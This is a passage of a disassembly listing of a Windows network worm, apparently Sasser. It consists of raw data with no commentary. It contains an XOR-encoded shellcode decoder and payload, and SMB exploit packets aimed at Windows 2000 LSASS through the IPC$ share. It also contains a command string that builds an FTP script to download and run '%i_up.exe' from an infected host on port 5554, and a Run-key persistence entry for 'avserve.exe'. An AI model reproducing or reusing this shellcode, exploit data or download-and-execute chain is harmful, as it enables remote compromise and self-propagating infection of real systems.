dd 6F666E49h, 41h, 43746547h, 616D6D6Fh, 694C646Eh, 41656Eh
dd 65470000h, 72655674h, 6E6F6973h, 0
aExitprocess db 'ExitProcess',0
dd 65540000h, 6E696D72h, 50657461h, 65636F72h, 7373h, 65470000h
dd 72754374h, 746E6572h, 636F7250h, 737365h, 6E550000h
dd 646E6168h, 4564656Ch, 70656378h, 6E6F6974h, 746C6946h
dd 7265h, 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 41h, 65657246h, 69766E45h, 6D6E6F72h, 53746E65h
dd 6E697274h, 577367h, 69570000h, 68436564h, 6F547261h
dd 746C754Dh, 74794269h, 65h, 45746547h, 7269766Eh, 656D6E6Fh
dd 7453746Eh, 676E6972h, 73h, 45746547h, 7269766Eh, 656D6E6Fh
dd 7453746Eh, 676E6972h, 5773h, 65530000h, 6E614874h, 43656C64h
dd 746E756Fh, 0
aGetstdhandle db 'GetStdHandle',0
align 10h
aGetfiletype db 'GetFileType',0
dd 65480000h, 65447061h, 6F727473h, 79h, 70616548h, 61657243h
dd 6574h, 69560000h, 61757472h, 6572466Ch, 65h, 70616548h
dd 65657246h, 0
aRtlunwind db 'RtlUnwind',0
align 10h
aWritefile db 'WriteFile',0
align 4
aMultibytetowid db 'MultiByteToWideChar',0
dd 65470000h, 72745374h, 54676E69h, 41657079h, 0
aGetstringtypew db 'GetStringTypeW',0
align 4
dd 65470000h, 49504374h, 6F666Eh, 65470000h, 50434174h
dd 0
aGetoemcp db 'GetOEMCP',0
align 4
aHeapalloc db 'HeapAlloc',0
align 4
aVirtualalloc db 'VirtualAlloc',0
align 4
aHeaprealloc db 'HeapReAlloc',0
dd 434C0000h, 5370614Dh, 6E697274h, 4167h, 434C0000h, 5370614Dh
dd 6E697274h, 5767h, 194h dup(0)
dword_406000 dd 0 dword_406004 dd 0 dword_406008 dd 0 dd offset ___initmbctable
dword_406010 dd 0 dword_406014 dd 0 dword_406018 dd 0 dword_40601C dd 0 dword_406020 dd 4 dup(0) off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_401153+DF�r
; "echo off&echo open %s 5554>>cmd.ftp&ech"...
; char Str[]
Str db 'ë' ; DATA XREF: sub_40152C+132�o
; sub_40152C+1AB�o
; ---------------------------------------------------------------------------
adc [edx+4Ah], bl
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: .text:00406042�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
dw 0EBE8h
db 3 dup(0FFh)
; ---------------------------------------------------------------------------
loc_40604B: ; CODE XREF: .text:00406044�j
jo short near ptr dword_405990+652h
cwde
cdq
cdq
retn
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40152C+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_4012D8+1AD�o
; sub_40152C+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4012D8+1D8�o
; sub_40152C+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4012D8+1FD�o
; sub_40152C+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4012D8+51�o
; sub_40152C+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_4012D8+83�o
; sub_40152C+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40152C+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40152C+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40152C+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401492+3 ; DATA XREF: sub_40152C+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40152C+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40152C+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; sub_40152C+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
; char *off_4068C8
off_4068C8 dd offset aAvserve_exe ; DATA XREF: sub_402071:loc_4020C9�r
; sub_402071+B5�r
; "avserve.exe"
dd offset aAvserve ; "avserve"
; char *off_4068D0
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B03+1A�r
; sub_401B03+2D�r
; char *off_4068D4
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B03+77�r
; sub_401B03+84�r
; char *off_4068D8
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B03+A8�r
; sub_401B03+B5�r
; char *off_4068DC
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B03+2C6�r
; sub_401B03+2D3�r ...
; char *off_4068E0
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B03+184�r
; sub_401B03+191�r
; char *off_4068E4
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B03+1B9�r
; sub_401B03+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fhdword_4068F0 dd 20303032h, 0A4B4Fhdword_4068F8 dd 20363232h, 0A4B4Fhdword_406900 dd 20303332h, 0A4B4Fhdword_406908 dd 20313333h, 0A4B4Fhdword_406910 dd 20303232h, 0A4B4FhaAvserve db 'avserve',0 ; DATA XREF: .text:004068CC�o
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: .text:off_4068C8�o
aEchoOffEchoOpe db 'echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.'
db 'ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on'
db 0Ah,0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 10h
aSC db '%s%c',0 ; DATA XREF: sub_4012D8+22F�o
align 4
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_4012D8+1D�o
; sub_40152C+23�o
align 4
dword_406A14 dd 6EB06EBh, 0 dword_406A1C dd 1CEC8166h dword_406A20 dd 0E4FF07h ; char a5_0[]
a5_0 db '5.0',0 ; DATA XREF: sub_401A12+4A�o
; char SubStr[]
SubStr db '5.1',0 ; DATA XREF: sub_401A12+27�o
aCWin_log db 'c:\win.log',0 ; DATA XREF: sub_401A96+27�o
align 4
aI db '%i',0 ; DATA XREF: sub_401A96+16�o
align 4
; char aQuit[]
aQuit db 'QUIT',0 ; DATA XREF: sub_401B03+2E4�o
align 4
; char aRetr[]
aRetr db 'RETR',0 ; DATA XREF: sub_401B03+1A2�o
align 4
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B03+173�o
; sub_401EF5+CF�o
word_406A58 dw 2Ch ; DATA XREF: sub_401B03+EE�r
align 4
; char aPort[]
aPort db 'PORT',0 ; DATA XREF: sub_401B03+C6�o
align 4
; char aPass[]
aPass db 'PASS',0 ; DATA XREF: sub_401B03+95�o
align 4
; char aUser[]
aUser db 'USER',0 ; DATA XREF: sub_401B03+64�o
align 4
aJobaka3l db 'Jobaka3l',0 ; DATA XREF: WinMain(x,x,x,x)+22�o
align 10h
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_402071+8C�o
align 10h
; char asc_406AB0[]
asc_406AB0: ; DATA XREF: sub_402071+4B�o
unicode 0, <\>,0
align 10h
off_406AC0 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_406AC4 dd 2 ; __NMSG_WRITE+46�r
align 10h
off_406AD0 dd offset __wctype+2 ; DATA XREF: _isalnum+1E�r
; __isctype+12�r ...
dd offset __wctype+2
public __wctype
; const unsigned __int16 _wctype[]
__wctype dd 200000h ; DATA XREF: _x_ismbbtype+18�r
; .text:off_406AD0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406CDC dd 1 dd 2Eh, 1
dword_406CE8 dd 0C0000005h ; _xcptlookup+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406D60 dd 3 dword_406D64 dd 7 dword_406D68 dd 0Ah dword_406D6C dd 8Ch ; __XcptFilter+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406D7C dd 19930520h, 4 dup(0) ; __NLG_Notify+2�o
dword_406D90 dd 2 ; __NMSG_WRITE+28�r
off_406D94 dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+FC�r
; __NMSG_WRITE+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 40536Ch, 9, 405340h, 0Ah, 40531Ch, 10h, 4052F0h
dd 11h, 4052C0h, 12h, 40529Ch, 13h, 405270h, 18h, 405238h
dd 19h, 405210h, 1Ah, 4051D8h, 1Bh, 4051A0h, 1Ch, 405178h
dd 78h, 405168h, 79h, 405158h, 7Ah, 405148h, 0FCh, 405144h
dd 0FFh, 405134h
byte_406E20 db 1 ; DATA XREF: __NMSG_WRITE+1B�o
; __setmbcp+E1�r
db 2, 4, 8
align 8
dword_406E28 dd 3A4h dd 82798260h, 21h, 0 ; DATA XREF: __setmbcp+11D�r
dword_406E38 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_406F18 dd 3F8h ; __heap_alloc+5�r
align 10h
dword_406F20 dd 0 ; sub_401000+10�w ...
dword_406F24 dd 0 ; sub_401A96+D�r
; char Source[]
Source db 4 dup(0) ; DATA XREF: sub_401153+BE�o
; sub_4012D8+9�o ...
dword_406F2C dd 0 ; char *dword_406F30
dword_406F30 dd 0 ; __setenvp:loc_402D41�r ...
align 8
dword_406F38 dd 0 ; _fast_error_exit�r ...
dd 3 dup(0)
dword_406F48 dd 0 dword_406F4C dd 0 dword_406F50 dd 0 dword_406F54 dd 0 dword_406F58 dd 0 dword_406F5C dd 0 dd 0
dword_406F64 dd 0 dd 3 dup(0)
dword_406F74 dd 0 dd 0
byte_406F7C db 0 ; DATA XREF: _doexit+2D�w
align 10h
dword_406F80 dd 0 dword_406F84 dd 0 dword_406F88 dd 0 ; __XcptFilter+46�w ...
dword_406F8C dd 3Ch dup(0) dword_40707C dd 5 dup(0) ; .text:00406638�o ...
dword_407090 dd 0 ; ___crtGetEnvironmentStringsA+23�w ...
dword_407094 dd 0 dword_407098 dd 0 ; ___crtGetStringTypeA:loc_403716�w
dword_40709C dd 0 ; _getSystemCP+4�w ...
dword_4070A0 dd 0 ; ___crtMessageBoxA+2E�w ...
dword_4070A4 dd 0 ; ___crtMessageBoxA:loc_404552�r
dword_4070A8 dd 0 ; ___crtMessageBoxA+60�r
dd 2 dup(0)
dword_4070B4 dd 0 dd 3 dup(0)
dword_4070C4 dd 0 ; _getSystemCP+3A�r ...
dd 0
dword_4070CC dd 0 ; ___crtLCMapStringA+4C�w ...
dword_4070D0 dd 0 dword_4070D4 dd 0 dword_4070D8 dd 0 ; ___sbh_alloc_new_region+5�r ...
dword_4070DC dd 0 ; ___sbh_free_block+259�r ...
dword_4070E0 dd 0 ; ___sbh_free_block+310�w ...
; void *Dst
Dst dd 0 ; DATA XREF: ___sbh_heap_init:loc_403CD7�w
; ___sbh_free_block+22C�r ...
dword_4070E8 dd 0 ; ___sbh_find_block�r ...
dword_4070EC dd 0 ; ___sbh_find_block+8�r ...
dword_4070F0 dd 0 ; __setmbcp+65�w ...
align 10h
dword_407100 dd 3 dup(0) ; __setmbcp+171�o ...
dword_40710C dd 0 ; __setmbcp+15D�w ...
dd 4 dup(0)
byte_407120 db 0 ; DATA XREF: _setSBUpLow:loc_403B82�w
; _setSBUpLow:loc_403B9F�w ...
align 4
dd 3Fh dup(0)
byte_407220 db 0 ; DATA XREF: __setmbcp+5C�o
; __setmbcp+AF�o ...
byte_407221 db 0 ; DATA XREF: _parse_cmdline+3F�r
; _parse_cmdline+84�r ...
align 4
dd 40h dup(0)
dword_407324 dd 0 ; __setmbcp+12B�w ...
dword_407328 dd 0 ; __heap_init+29�r ...
dd 5 dup(0)
dword_407340 dd 0 ; __ioinit+45�r ...
dword_407344 dd 3Fh dup(0) dword_407440 dd 0 ; __ioinit:loc_4031F1�r ...
dword_407444 dd 0 dword_407448 dd 0 dword_40744C dd 0 dword_407450 dd 0 dword_407454 dd 0 dword_407458 dd 0 dd 6E9h dup(0)
_text ends
; Section 3. (virtual address 0001A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00019200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 41A000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start